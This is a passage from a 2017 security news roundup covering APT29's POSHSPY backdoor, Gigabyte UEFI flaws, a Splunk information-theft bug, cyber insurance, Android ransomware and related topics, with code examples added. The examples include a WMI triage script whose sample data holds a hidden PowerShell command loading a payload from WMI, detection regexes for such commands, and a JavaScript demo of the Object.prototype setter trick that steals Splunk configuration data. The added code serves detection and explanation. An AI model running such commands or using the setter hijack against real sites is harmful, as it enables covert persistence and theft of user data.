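    paranoid: bool = False                       # alert even when the screen is unlocked
    allowlist: set = field(default_factory=set)  # "vendor:model" pairs never alerted on

    def should_alert(self, event, screen_locked):
        if event.action != "add":                # removals are not interesting
            return False
        if f"{event.vendor_id}:{event.model_id}" in self.allowlist:
            return False
        return screen_locked or self.paranoid


def format_alert(event, hostname="workstation-17"):
    """Text of the SMS/Slack notification (hostname is a constructed example)."""
    return (f"[{hostname}] USB device inserted: {event.model or 'unknown'} "
            f"({event.vendor_id}:{event.model_id})")


def xscreensaver_locked():
    """Lock probe for XScreenSaver: 'xscreensaver-command -time' prints
    'screen locked since ...' while the lock is active. Returns False when
    the command is unavailable or times out."""
    try:
        out = subprocess.run(["xscreensaver-command", "-time"],
                             capture_output=True, text=True, timeout=2)
    except (OSError, subprocess.TimeoutExpired):
        return False
    return "locked" in out.stdout


def evaluate(events, policy, screen_locked):
    """Run the policy over a batch of events; return the alert strings produced."""
    return [format_alert(e) for e in events if policy.should_alert(e, screen_locked)]


def main():
    """Live monitor using pyudev (the library USB Canary uses); needs udev access."""
    import pyudev
    policy = CanaryPolicy(paranoid=False)
    monitor = pyudev.Monitor.from_netlink(pyudev.Context())
    monitor.filter_by(subsystem="usb", device_type="usb_device")
    for device in iter(monitor.poll, None):
        event = UsbEvent(device.action, device.get("ID_VENDOR_ID", ""),
                         device.get("ID_MODEL_ID", ""), device.get("ID_MODEL", ""))
        if policy.should_alert(event, xscreensaver_locked()):
            print(format_alert(event))   # replace with the Twilio or Slack call


if __name__ == "__main__":
    main()
```

Filtering on device_type "usb_device" keeps one event per physical device rather than one per interface, and the allow-list lets a docked keyboard or receiver stay quiet in paranoid mode without silencing everything else.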

Although this began as a personal project, others have already picked it up and helped improve it through their contributions.

The open source tool is available via GitHub.


APT29 Uses Stealthy Backdoor to Maintain Access to Targets

3.4.2017 securityweek APT
Researchers at FireEye-owned Mandiant have conducted a detailed analysis of a stealthy backdoor used by the Russia-linked cyberespionage group APT29 to maintain access to targeted systems.

Dubbed “POSHSPY,” the malware is believed to be a secondary backdoor used by the cyberspies in case they lose access to their primary backdoors. Mandiant first spotted POSHSPY in 2015 during an incident response engagement, and identified it on the networks of several organizations over the past two years.

Similar to other pieces of malware used by APT29, POSHSPY leverages PowerShell and the Windows Management Instrumentation (WMI) administrative framework.

WMI can be used to obtain system information, start and stop processes, and configure conditional triggers. In the case of POSHSPY, WMI is used to run a PowerShell command that decrypts and executes the backdoor code directly from a WMI property, thus ensuring that no artifacts are left on the hard drive.

The WMI component of POSHSPY executes the PowerShell component every Monday, Tuesday, Thursday, Friday and Saturday at 11:33 AM local time.

Experts pointed out that the use of legitimate Windows tools and the other techniques employed in these attacks increase the backdoor’s chances of evading detection.

“POSHSPY's use of WMI to both store and persist the backdoor code makes it nearly invisible to anyone not familiar with the intricacies of WMI. Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory,” explained Matthew Dunwoody, incident response consultant at Mandiant.

“The backdoor's infrequent beaconing, traffic obfuscation, extensive encryption and use of geographically local, legitimate websites for command and control (C2) make identification of its network traffic difficult. Every aspect of POSHSPY is efficient and covert,” Dunwoody added.
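The "enhanced logging" Dunwoody mentions is one route; the other is to enumerate the WMI permanent event subscriptions themselves, which is where a subscription like the one described above lives. The triage below is an added example written for this page, not Mandiant's code. It takes the records you get from exporting root\subscription (Get-WmiObject -Namespace root\subscription -Class __EventFilter, CommandLineEventConsumer and __FilterToConsumerBinding) and flags bindings whose filter is driven by Win32_LocalTime or whose consumer launches hidden or encoded PowerShell. The sample records are constructed to match the schedule in the article; "WindowsUpdateChecker", "WindowsUpdateRunner" and "Win32_UpdateStatus" are invented names.

```python
"""Triage of WMI permanent event subscriptions for POSHSPY-style persistence:
a time-based __EventFilter bound to a CommandLineEventConsumer that launches
hidden PowerShell which pulls its payload out of a WMI property.
Added example for this page, not Mandiant's code. Input records are what an
export of root\\subscription gives you (Get-WmiObject -Namespace root\\subscription
-Class __EventFilter / CommandLineEventConsumer / __FilterToConsumerBinding);
the records below are constructed to match the schedule described in the
article, and the "WindowsUpdate*"/"Win32_UpdateStatus" names are invented."""
import re

DAY_NAMES = {0: "Sun", 1: "Mon", 2: "Tue", 3: "Wed", 4: "Thu", 5: "Fri", 6: "Sat"}
# PowerShell launched hidden, non-interactive, encoded, or loading code from WMI.
SUSPICIOUS_PS = re.compile(
    r"powershell(\.exe)?.*?(-(enc|encodedcommand|e)\b|-nop\b|-w(indowstyle)?\s+hidden"
    r"|\biex\b|invoke-expression|\[wmiclass\]|get-wmiobject)", re.I)


def ref_name(ref):
    """'__EventFilter.Name="X"' -> 'X' (the form __FilterToConsumerBinding stores)."""
    m = re.search(r'Name="([^"]+)"', ref)
    return m.group(1) if m else ref


def describe_time_filter(query):
    """If the WQL polls Win32_LocalTime, return (day names, hour, minute); else None."""
    if not re.search(r"ISA\s+'Win32_LocalTime'", query, re.I):
        return None
    days = sorted({int(d) for d in re.findall(r"DayOfWeek\s*=\s*(\d)", query)})
    hour = re.search(r"\bHour\s*=\s*(\d+)", query)
    minute = re.search(r"\bMinute\s*=\s*(\d+)", query)
    return (tuple(DAY_NAMES[d] for d in days),
            int(hour.group(1)) if hour else None,
            int(minute.group(1)) if minute else None)


def triage(filters, consumers, bindings):
    """One finding per binding whose filter is time-driven or whose consumer
    runs PowerShell suspiciously; benign bindings (e.g. the default SCM pair)
    produce nothing."""
    filters_by_name = {f["Name"]: f for f in filters}
    consumers_by_name = {c["Name"]: c for c in consumers}
    findings = []
    for b in bindings:
        flt = filters_by_name.get(ref_name(b["Filter"]))
        con = consumers_by_name.get(ref_name(b["Consumer"]))
        if flt is None or con is None:
            continue
        reasons = []
        sched = describe_time_filter(flt["Query"])
        if sched:
            days, hour, minute = sched
            when = f"{hour:02d}:{minute:02d}" if hour is not None and minute is not None else "unspecified time"
            reasons.append(f"time-triggered filter: {','.join(days) or 'any day'} at {when}")
        if SUSPICIOUS_PS.search(con.get("CommandLineTemplate", "")):
            reasons.append("consumer launches hidden/encoded PowerShell or loads code from WMI")
        if reasons:
            findings.append({"filter": flt["Name"], "consumer": con["Name"], "reasons": reasons})
    return findings


# Constructed sample dump: the default SCM pair present on every Windows host,
# plus a POSHSPY-like pair firing Mon/Tue/Thu/Fri/Sat at 11:33 (DayOfWeek: Sunday = 0).
SAMPLE_FILTERS = [
    {"Name": "SCM Event Log Filter", "Query": "select * from MSFT_SCMEventLogEvent"},
    {"Name": "WindowsUpdateChecker", "Query":
        "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' "
        "AND (TargetInstance.DayOfWeek=1 OR TargetInstance.DayOfWeek=2 OR TargetInstance.DayOfWeek=4 "
        "OR TargetInstance.DayOfWeek=5 OR TargetInstance.DayOfWeek=6) "
        "AND TargetInstance.Hour=11 AND TargetInstance.Minute=33 GROUP WITHIN 60"},
]
SAMPLE_CONSUMERS = [
    {"Name": "SCM Event Log Consumer", "CommandLineTemplate": ""},
    {"Name": "WindowsUpdateRunner", "CommandLineTemplate":
        "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "
        "\"iex ([wmiclass]'root\\cimv2:Win32_UpdateStatus').Properties['Payload'].Value\""},
]
SAMPLE_BINDINGS = [
    {"Filter": '__EventFilter.Name="SCM Event Log Filter"',
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"'},
    {"Filter": '__EventFilter.Name="WindowsUpdateChecker"',
     "Consumer": 'CommandLineEventConsumer.Name="WindowsUpdateRunner"'},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_FILTERS, SAMPLE_CONSUMERS, SAMPLE_BINDINGS):
        print(hit)
```

Keying on the binding rather than on filters or consumers alone matters: a stray filter with no consumer does nothing, and an attacker can give both halves innocuous names, but the pairing of a clock-driven WQL query with a PowerShell consumer is rarely legitimate.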

The malware allows attackers to download and execute additional PowerShell code and executable files. The threat communicates with command and control (C&C) servers located at URLs generated using a domain generation algorithm (DGA) that relies on lists of domain names, TLDs, subdomains, URIs, file names and file extensions. C&C communications are encrypted using AES and RSA public key cryptography.

FireEye has not shared any information on which countries or what types of organizations have been targeted in attacks involving the POSHSPY backdoor.

The APT29 group has put some effort into making its operations more difficult to detect. Earlier this month, FireEye detailed the threat actor’s use of a technique called “domain fronting” to disguise the malicious traffic generated by its tools.

APT29 is also known as The Dukes, Cozy Bear and Cozy Duke. The group is believed to be behind the recent election-related attacks in the U.S. and a campaign targeting high-profile organizations in Norway.


UEFI Vulnerabilities Found in Gigabyte Mini PCs

3.4.2017 securityweek Vulnerebility

Endpoint security firm Cylance has disclosed the details of two potentially serious UEFI vulnerabilities that can be exploited to install a backdoor on some Gigabyte BRIX mini PCs. The vendor is working on a firmware update that will address the flaws.

Cylance said it had tested the latest firmware for GB-BSi7H-6500 and GB-BXi7-5775 mini PCs and discovered that some important protection mechanisms are missing. The company has described an attack scenario where a malicious actor exploits the vulnerabilities to deliver a ransomware payload that prevents the system from booting.

One of the vulnerabilities found by researchers, tracked as CVE-2017-3197, is related to the SMI handler and it allows an attacker to execute code in System Management Mode (SMM). The American Megatrends (AMI) firmware present on affected devices does normally provide write-protection mechanisms designed to prevent unauthorized changes, but these protections have not been enabled by Gigabyte.

Hackers can exploit this flaw for malicious attacks by first gaining access to the targeted system via a browser or document exploit. The attacker can then elevate privileges to achieve kernel mode code execution. Since write-protection mechanisms are not enabled, the attacker can exploit the SMI vulnerability to execute code in SMM and make changes to the flash memory.

The second vulnerability, CVE-2017-3198, stems from the Gigabyte UEFI not performing a cryptographic signature check to ensure that a firmware update is legitimate. Furthermore, firmware updates are served over plain HTTP, so an image can also be swapped in transit.

An attacker who has gained access to a targeted system can therefore install the legitimate UEFI update utility and use it, unmodified, to push a malicious firmware image onto the device.

“Successful infection at such a low level has the potential to be disastrous,” Cylance researchers said in a blog post. “UEFI rootkits and ransomware could provide attackers with a degree of control that is difficult, if not near-impossible, to detect or rectify.”

The vulnerabilities were discovered on December 20 and reported to Gigabyte in mid-January. The vendor says it has prepared a firmware update, version vF7, that is in the final phase of testing. However, the update will only be made available for the GB-BSi7H-6500, as the GB-BXi7-5775 model has reached end of life.


Splunk Patches Information Theft and XSS Flaws

3.4.2017 securityweek Vulnerability
Splunk last week released an update for Splunk Enterprise to address an information theft bug and a persistent Cross Site Scripting (XSS) vulnerability.

Discovered last year by security researcher John Page (who goes by the online handle of hyp3rlinx), the information theft issue is tracked as CVE-2017-5607 and has been assessed a CVSS Base Score of 3.5. The vulnerability can be exploited by a remote attacker to siphon information from Splunk Enterprise when the user visits a malicious webpage.

In his advisory, the researcher notes that an attacker exploiting this vulnerability could read data such as the username of the currently logged-in user and whether the remote user setting is enabled. With a valid username in hand, the attacker could then phish that user or brute force the Splunk Enterprise login.

The attack needs nothing more than JavaScript on a page the victim visits: the root cause, the researcher notes, is that the response to the config?autoload=1 request is a script that assigns the configuration to the global window variable '$C', so any page that includes that response with a script tag can hook the assignment.

“To steal information we simply can define a function to be called when the '$C' JS property is ‘set’ on webpage, for example.

Object.defineProperty( Object.prototype, "$C", { set:function(val){...

The Object prototype is an Object that every other object inherits from in JavaScript, if we create a setter on the name of our target in this case "$C", we can get/steal the value of this data, in this case it is very easy as it is assigned to global Window namespace,” the researcher explains.
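The mechanism the researcher describes, reproduced as an added example (this is not the advisory's proof-of-concept and not Splunk's code): a simulated autoload script assigns a constructed configuration object to a global in the vulnerable way, the attacker's prototype setter captures it, and a second variant defines the global as an own property so the inherited setter never runs. The field names in SAMPLE_CONFIG and all function names are assumptions made for the example.

```javascript
"use strict";

// Attacker side: put a setter for "$C" on Object.prototype. Any ordinary object
// that has no own "$C" property (a browser's window object included, since it
// inherits from Object.prototype) reaches this accessor when "$C" is assigned.
// Returns a function that removes the hook again.
function installHook(sink) {
  Object.defineProperty(Object.prototype, "$C", {
    configurable: true,             // so the hook can be deleted afterwards
    set(val) { sink.push(val); },   // receives whatever the victim script assigns
    get() { return undefined; },    // the victim page never sees its own config
  });
  return () => { delete Object.prototype.$C; };
}

// Constructed stand-in for what a config?autoload=1 response carries.
// The field names are assumptions for this example, not Splunk's real schema.
const SAMPLE_CONFIG = {
  USERNAME: "admin",
  SERVER_NAME: "splunk-host",
  REMOTE_USER_ENABLED: false,
};

// Victim side, vulnerable shape: a cross-origin <script src=".../config?autoload=1">
// runs in the attacker's page and performs a plain assignment to a global.
// Ordinary [[Set]] walks the prototype chain, so the inherited setter above runs.
function vulnerableAutoload(win, config) {
  win.$C = config;
}

// Same assignment, hardened: defineProperty creates an own data property and never
// consults inherited accessors, so the hook sees nothing. This closes only the
// prototype-setter trick; not serving session data as includable script is the real fix.
function hardenedAutoload(win, config) {
  Object.defineProperty(win, "$C", {
    value: config, writable: true, enumerable: true, configurable: true,
  });
}

// Run one autoload variant with the hook installed and return what leaked.
// `win` stands in for the page's global object; a fresh {} behaves like window or
// globalThis here because all of them inherit from Object.prototype.
function leakedBy(autoload, win = {}) {
  const sink = [];
  const uninstall = installHook(sink);
  try {
    autoload(win, SAMPLE_CONFIG);
  } finally {
    uninstall(); // leave Object.prototype clean for whatever runs next
  }
  return sink;
}

// The detail the advisory singles out: the logged-in username.
function stolenUsernames(autoload, win = {}) {
  return leakedBy(autoload, win).map((cfg) => cfg.USERNAME);
}

console.log("vulnerable, plain object:", stolenUsernames(vulnerableAutoload));            // [ 'admin' ]
console.log("vulnerable, globalThis:", stolenUsernames(vulnerableAutoload, globalThis));
console.log("hardened, plain object:", stolenUsernames(hardenedAutoload));                // []
```

The plain-object stand-in and the runtime's real global object behave the same way because both inherit from Object.prototype, which is exactly why the trick works against window in a browser. Defining the global with Object.defineProperty only neutralises this particular hook; the exposure itself comes from serving per-session data as a script that any origin can include, which is why upgrading to the patched versions listed below matters more than any client-side change.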

Splunk has confirmed that affected Splunk Enterprise versions include 6.5.x before 6.5.3; 6.4.x before 6.4.6; 6.3.x before 6.3.10; 6.2.x before 6.2.13.1; 6.1.x before 6.1.13; 6.0.x before 6.0.14; 5.0.x before 5.0.18; and Splunk Light before 6.5.2.

The security researcher discovered the bug in November 2016 and reported it to Splunk the same month. He received acknowledgement of the bug a couple of days later, but the patch was released only last week. The researcher published not only details pertaining to the vulnerability, but also proof-of-concept JavaScript code and a video to demonstrate the flaw.

The second vulnerability addressed in Splunk Enterprise last week was a persistent Cross Site Scripting in Splunk Web, which was found to allow an attacker to inject and store arbitrary script, but only if they are authenticated in Splunk web before exploiting the bug. Assessed with a CVSS Base Score of 6.6, the flaw impacts Splunk Enterprise versions 6.5.x before 6.5.3; 6.4.x before 6.4.6; 6.3.x before 6.3.10; 6.2.x before 6.2.13; and Splunk Light before 6.5.2.


Cyber Risk and Cyber Insurance – Insurance challenge to the CIO as corporate Cyber Security Effectiveness manager
3.4.2017 securityaffairs CyberCrime

[By Cesare Burei, Margas, courtesy of @CLUSIT – Rapporto Clusit 2017 – All rights reserved]
Until corporate Risk Managers who deal with Cyber Risk, and there are not many of them, start working at all levels, who should be entrusted with the management of Cyber Risk and, more specifically, with its transfer to insurance companies? The answer is a joint round table driven by the CIO.

The Clusit Report 2016 provided the basics of the terminology, key features and usefulness of cyber policies in a Focus On dedicated to insurance in support of so-called Cyber Risk management. The authors implicitly addressed the CFO, the position that usually supervises insurance matters in a company.

One year on, the daily dealings between businesses, insurance brokers and ICT consultants have highlighted the following elements:

Cyber Risk includes the incident/attack and all its direct and indirect consequences
Awareness of the pervasive nature of Cyber Risk has increased: it reaches well beyond the walls of the EDP department, into a digital ecosystem built on interconnections and on the interdependence of processes, people and now objects (IoT)
Risk Management, meaning risk analysis, mitigation and transfer to insurance, has become increasingly important
Business interruption, loss of reputation and data loss/unavailability are the most frequent issues for businesses
This gave rise to a double survey in the North-East of Italy, which resulted in the “Enterprise Cyber Risk Exposure & Insurance” report (1) by Via Virtuosa, in collaboration with Margas for the insurance part, published online at the end of 2016 and hereinafter called the “White Paper”.

The first survey outlines, through the answers given by CIOs and systems administrators, the risk exposure of companies, so that CFOs and CEOs can become aware of the central role of the Cyber Security function, whether managed in-house or outsourced. The second survey, also carried out with the help of the CIO, who has to assess the risk or the protection levels in place, tries to gauge the level of knowledge of, and sensitivity to, insurance transfer.

The results highlight the key role of the CIO in the transition from managing ICT security to managing cyber risk for the whole company; the transfer of the so-called “residual risk” to an insurance company is the final, fundamental component of that management. For this reason, the White Paper includes some basic information on the Italian insurance market and, above all, the 18 questions that three CIOs agreed to ask, together with 18 useful answers that help readers approach the purchase of an insurance policy with greater awareness.

(1) The “Cyber Risk Exposure & Cyber Risk Insurance” white paper is the result of the joint efforts of Luca Moroni and Cesare Burei. It also includes contributions by the CIOs E. Guarnaccia – BPV | M. Cozzi – Hypo Bank | A. Cobelli – ATV, and the answers to their 18 questions on cyber insurance. The risk exposure survey was carried out over the three-year period 2013-2016, while the one on Cyber Risk Insurance was carried out in summer 2016. The white paper can be downloaded free of charge from www.viavirtuosa.com/whitepaper and supports the “Generation Z” survey on online security and the prevention of risk for minors: https://www.facebook.com/ProgettoGenerazioneZ/

Cyber Risk Insurance. Why?
The certainty that it is not possible to defend oneself completely from Cyber Risk means that such risk must be managed and that the relevant tools must be assessed correctly in terms of costs and benefits. In short, it is a matter of balance between the impact of a cyber or cyber-related adverse event, the money spent on management and insurance, and the preservation of business margins.

Source: L. Moroni – “Cyber Exposure & Cyber Risk Insurance” White paper presentation at Infosek 2016 – Slovenia

At the Security Summit, and thanks to the Clusit Report, a great many figures and percentages were made public to describe the overall state of cyber insecurity; they all underscore that there is no 100% safe system.

Source: CHUBB Claim Trends 8/2016

It is possible to be proactive, with effective and appropriate investments in the reduction of corporate risk, so as to be prepared for incidents and the costs and damages they cause. Insurance policies turn an uncertain, often unsustainable cost into a planned and sustainable premium. The choice must therefore be based on a careful assessment during the prevention phase, so that the policies truly act as a financial and economic parachute, allowing the company to avoid closure and remain competitive after an incident, with the appropriate tools to compensate balance-sheet losses and recover brand reputation.

Source: CHUBB Claim Trends 8/2016

Cyber Risk Exposure and Cyber Risk Insurance
Speaking of Cyber Risk Insurance, meaning a policy or set of policies that “cover” the damages and costs generated by a cyber or cyber-related adverse event, makes no sense without awareness of one's own risk exposure and, consequently, an attempt to adopt measures that mitigate it.

The risk exposure survey results

The risk exposure survey carried out by Via Virtuosa over the course of 3 years, synthesised in the White Paper, “rather than highlighting an individual company's positioning and risk exposure, focuses on the statistical trends of the interviewed sample, in this case, companies in the North-Eastern part of Italy, as against a reference Base Line (Red Line). The measuring method used in this case is strictly objective (as was the case for the 2700x) and the same for the whole sample group, even though it was considerably simplified. The method in question is the one adopted by the European Union Agency for Network and Information Security (ENISA).”

Those who fall in the yellow section at the top right of the chart have a significant risk exposure, with a potentially disruptive impact on their business, and are invited (as per the method) to “outsource their risk.”

This research highlighted the following aspects:

There is a high level of corporate cyber risk with a direct impact on business continuity.
The IT department is usually aware of the issue, but faces an almost total lack of managerial attention from the corporate board, which translates into a dearth of investment.
Enterprises have no objective measure of their cyber risk.
Objective indications of the need to transfer cyber risk outside the company emerge.
The results of the CIOs and Cyber Risk Insurance survey
The sample of this second survey was mostly made up of subjects from the industry and services sectors (40% and 35%, respectively), with turnover exceeding 20 million Euro (75%) and with over 100 employees (50% between 100 and 500, 30% above 500).

This presupposes that aspects such as reputation, business interruption and sensitive data management might be critical.

In the survey, IT managers were first asked about the best-case scenario in terms of board commitment to the creation of a corporate security team, and whether ICT security is considered an integral part of the general approach to security or just a possible source of costs and damages (questions 1, 4).

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

Then the same subjects were asked to do something that was probably unusual for them: interact with their CFOs to answer a question on the presence of insurance policies that ought to be taken into consideration with regard to the critical points highlighted by the risk exposure analysis (question 3).

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

60% of the interviewed CIOs were involved in a wider approach to security. In 60% of cases, however, the CIO had not, up to that point, taken an interest in insurance policies (q. 2), and even though in 80% of cases no one in the company had thought to ask him about the impact of a possible incident (q. 4), he had a clear idea of its origins (q. 4) and was able to identify the department that might suffer most from a business interruption (question 8).

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

The CIO deals with ICT security: he monitors vulnerabilities (60% of cases) and the Business Continuity and Disaster Recovery plans (50-60% of cases), but very rarely deals with reputation crises (18%), the formalisation of procedures and policies (28%) or standardisation (12%).

It is a positive sign that the CIO receives requests for information concerning ICT security management (question 7) first of all from inside the company (over 70%), then from external auditors (over 28%) and from customers and ICT suppliers in equal measure (23-24%). The latter percentages might increase in future, leading to supply chain control both in terms of sound management and of insurance, and in any case they constitute a good foundation for a Cyber Risk Management policy.

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

39% of them state that they know of security incidents that occurred in the last 5 years. An analysis of the causes shows that such incidents are attributable, in roughly equal proportions, to external or internal attacks, with a prevalence of ransomware (as more than 50% declared), to internal or external human error, and to failures (question 9).

Source: “Cyber Risk Exposure & Cyber Risk Insurance” White paper, Via Virtuosa 12/2016

Question 8 revealed the CIO's opinion of where a halt of ICT activities would hurt most: administration/accounting (over 80%), logistics and deliveries (73%) and sales (60%). This lets the authors return to the value and meaning of insurance transfer: failure to pay suppliers, to place orders or to make deliveries can certainly hurt the bottom line in the short, medium or long term.

“Virtuous” companies, that is, those that have adopted Cyber Risk Management policies, can therefore deal with insurers with full awareness of the residual risk that needs to be transferred, especially with regard to business interruption, intentional or accidental cyber events and general or professional third-party liability, and can also correctly assess reputation risk where necessary.

With the CIO at the Cyber Risk Management round table
The results of the survey show that the CIO can act as a “cultural mediator” for the company, with the help of a competent insurance broker.

Below is a brief synthesis of the activities of a hypothetical operational round table on the management of cyber risk:

Cyber Risk Exposure and proactive approach: knowing the extent and nature of the exposure

Identify and quantify the assets and their value
Identify the exposure and its value, that is to say, the operating and financial consequences of an adverse event
Identify and quantify the investment in mitigation activities
Check the insurance coverage of the company and of its suppliers
Now the necessary tools and knowledge to deal with the insurance issues are in place, so it is time to TRANSFER THE RESIDUAL RISK.

Cyber Risk Insurance: transfer the residual risk to an Insurance Company

Identify a skilled insurance partner and analyse the company's insurance position.
Check the traditional policies purchased by the company to which the cyber coverage might be added.
Choose and structure a Cyber insurance policy that specifically deals with the risk to be transferred and the relevant costs (business interruption, general and professional third-party liability, violation or improper use of assets, defence of reputation, reaction and analysis countermeasures, etc.)
For further details, please refer to the Focus On feature in the 2016 Clusit Report.

The results of the “dialogue” between the CIO and the Insurance Broker – Answers concerning Cyber Risk Insurance
We asked the CIOs of three important companies in the North-East of Italy to ask any question they could think of in order to help a layman understand the opportunities and limitations of an insurance policy. Here is a synthesis of the answers to the 18 most frequently asked questions:

It is necessary to analyse the existing policies and check whether they also cover the ICT issues identified during the analysis;

To date, no shared standard measure of exposure is required. Any best practices or certifications for risk mitigation can nonetheless help the transfer of risk to the insurance company succeed, at better coverage conditions;

GDPR and insurance: it will be essential to know whether the company holds Sensitive Data according to the expanded definition of the new Regulation, in which country, and which measures it adopts to defend against data breaches. If the company's own or third-party Sensitive Data are entrusted to a third party, the existing contracts with that supplier must be analysed and the contractual indemnities checked, so that the cost of the actions the GDPR mandates is transferred correctly. If the company writes or customises code, the extent of its corporate (professional, general, product) liability must be assessed quite thoroughly;

Simulate the impact of a cyber adverse event on the bottom line, in terms of cost increases and loss of gross profit. This is perhaps the most critical and underestimated field, the one insurers know as Business Interruption.

To conclude, it is clear that the Cyber Risk Management approach must rest on close cooperation between the corporate risk owners, the CIO and the CFO, on a virtuous supply chain that includes customers and suppliers, on IT professionals expert in Cyber Security management and implementation, and on brokers expert in cyber matters who can support the company in choosing the right balance between costs and insurance guarantees.

Contents on http://www.clusit.it/rapportoclusit

Get the full report contacting rapporti@clusit.it

Copyright 2017 @ CLUSIT

All rights reserved to the authors of the work and to Clusit

Any reproduction or publication, even partial, without the written permission of CLUSIT is forbidden.


Social Media Passwords Provide Easy Route into Corporate Networks

3.4.2017 securityweek Social
A combination of “security fatigue” among users and inadequate password controls at the social media giants is providing a large attack vector for cybercriminals. That is the conclusion of a newly published survey of more than 250 security professionals, conducted at the RSA Conference in San Francisco in February 2017.

The survey (PDF), conducted by Thycotic, found that password hygiene is severely lacking even among security professionals. It found, for example, that 50% of security professionals have not changed their social network passwords for a year or more, and 20% have never changed them. When this is coupled with social networks not enforcing their own security options, the result is a weak underbelly for criminals to get into corporate networks.

"As we know," said Joseph Carson, Chief Security Scientist at Thycotic, "social networks give away a lot of private information. For people to not consider changing their passwords on a regular basis on their Facebook, Twitter and LinkedIn accounts, they are easily allowing hackers to access information that will grant them access to other facets of their lives, like their work computers and email. Not only is this a huge vulnerability, but this is also a flaw within large social networks that don't remind or make it clear and transparent to the user about the age or strength of the password or best practices."

It is a combination of factors that creates the problem. Users still choose weak passwords and reuse them across multiple accounts. Thirty percent of the security professional respondents have used, or still use, birthdays, addresses, pet names or children's names for their work passwords, all of which are easily guessed.

The problem is made worse by the increasing use of social logins, where separate internet services let users log on with their Facebook, LinkedIn or Twitter credentials. "Social Logins creates a major security risk because it becomes the master key for all other accounts," Carson told SecurityWeek. "The problem stems further because it is not a proper vault and is used for more than just social logins -- such as for communication, email, browsing and online shopping -- so it is easily targeted and exploited."

One concerning implication of this survey is that user awareness training alone cannot solve the problem. The poor password practices of the respondents, said Carson, "is an indication that even security professionals continue to use weak passwords for social accounts and that cyber awareness training and cyber hygiene still has a lot of room for improvement. Much of this is a result of cyber fatigue and lack of built-in automation for social accounts."

According to Verizon's 2016 Data Breach Investigations Report, 63% of confirmed data breaches involved weak, default or stolen passwords. "The use of stolen, weak or default credentials in breaches is not new, is not bleeding edge, is not glamorous, but boy howdy it works," the DBIR says.

Forrester Research puts the breach figure even higher, estimating in its 'Forrester Wave: Privileged Identity Management, Q3 2016' report that up to 80% of breaches involve the abuse of privileged accounts. Thycotic's own research indicates that use of passwords as the primary authentication control is still growing, estimating that the 90 billion passwords currently in use will grow to 300 billion by 2020.

Carson does not believe that the solution can simply be awareness training and improved password practices. "There is no such thing as an uncrackable password," Carson told SecurityWeek; "but you can make it very difficult with the computing power plus time to crack the password -- which can deter the attacker from even trying to crack the password. In most cases, it is easier for the attacker to ask the user to tell them the password via phishing scams."

But the big takeaway from Thycotic's survey is that users, even those who should know better, simply are not making it hard for the criminals. Coupled with the disinclination of the social media giants to enforce strong access requirements, social media is providing an easy route into employees' accounts and, from there, into corporate privileged accounts. Users, Thycotic suggests, cannot be relied upon to protect their passwords, which makes technology-based privileged account management a necessity.


Android Ransomware Employs Advanced Evasion Techniques

3.4.2017 securityweek Virus

A newly discovered Android ransomware family employs heavy obfuscation and delayed activation of malicious functionality to ensure it can evade anti-virus solutions, Zscaler security researchers warn.

The malware was found hidden inside a repackaged version of OK, a Russian entertainment and social networking app, which the malware author disassembled in order to insert malicious code. The legitimate OK app, which has over 50 million downloads on Google Play, has not been compromised.

The first evasion technique is a delay: the malicious activity only starts four hours after installation. Automated analysis typically observes a sample for a few minutes and expects malware to start operating immediately, so this ransomware is not flagged during that window.

After four hours have passed, users are prompted to grant the application device administrator rights. The activation screen cannot be dismissed: tapping “Cancel” only brings it straight back, and it is re-displayed until admin rights are granted, the researchers say.

As soon as this happens, the malicious app locks the device's screen and displays a ransom note informing users that their data has been encrypted and sent to the attacker's servers. Users are urged to pay a ransom of 500 rubles to restore their data and unlock the device. The attackers also try to scare users into paying by claiming that they will send a message to all of the victim's contacts saying that the device has been “blocked for viewing child pornography.”

According to Zscaler, however, the malware does not actually exfiltrate any of the victim's data, and it has no means of unlocking the compromised device. Although the ransomware does inform the command and control (C&C) server of the new victim, it has no mechanism to confirm that the ransom was paid, so the device remains locked whether the victim pays or not.

In addition to the delayed start of malicious activities, the ransomware’s malicious code is highly obfuscated. “Almost all strings, method names, variable names, and class names are disguised in such a way that it's extremely difficult to understand the code. Most of these methods are invoked using Java reflection technique, which allows the author to evade static analysis detection,” Zscaler says.

To stay protected from this threat, users are advised to avoid installing applications from third-party app stores. Those already infected should reboot the device in Safe Mode, revoke the application's device administrator rights, uninstall it, and then reboot the device normally.

Given the stealth tactics used in this ransomware, Zscaler says the malware author might well succeed in getting the app onto the Google Play store, although that has not happened so far.


Japan plans to develop a hack-proof satellite system
3.4.2017 securityaffairs BigBrothers

Japan plans to develop a hack-proof satellite system that protects transmissions between satellites and ground stations with dynamic encryption of the data.
Japan’s Internal Affairs and Communications Ministry plans to develop a communications system to protect satellites from cyber attacks.

The hack-proof satellite system will protect transmissions between satellites and ground stations by encrypting the data with dynamically changing codes.

“With the proposed plan, the government aims to establish a secure communications network that is unique to Japan, for domestic security purposes and to spur investment in the private-sector aerospace industry.” reported the Watertown Daily Times.

The ambitious project is led by the National Institute of Information and Communications Technology, which falls under the ministry, and involves government, industry and academic institutions. The goal is to offer the system for commercial use in five to ten years; the ministry aims to gain an advantage in the industry by developing a secure communications system that private-sector users (companies and organisations) will be able to use at low cost.

The final decision on the system will be taken this summer, and funds for it will be included in the budget plan for fiscal 2018.

Cyber attacks represent a serious threat to satellite communications. Satellites play a crucial role in our digital society and almost every industry benefits from their services, which is why their security is a pillar of governments' cyber security strategies worldwide.

Attackers pose a growing challenge to satellite operators; commercial satellites, which lack the level of security applied to military ones, are the most exposed. Security researchers warn about the possible effects of a successful attack against satellite systems and urge that they be built with a security-by-design approach.

Satellites communicate with terrestrial base stations using radio waves, which attackers can intercept, with unpredictable consequences.

An attacker who can decode the encrypted data can steal information, manipulate it or potentially take control of the satellite.

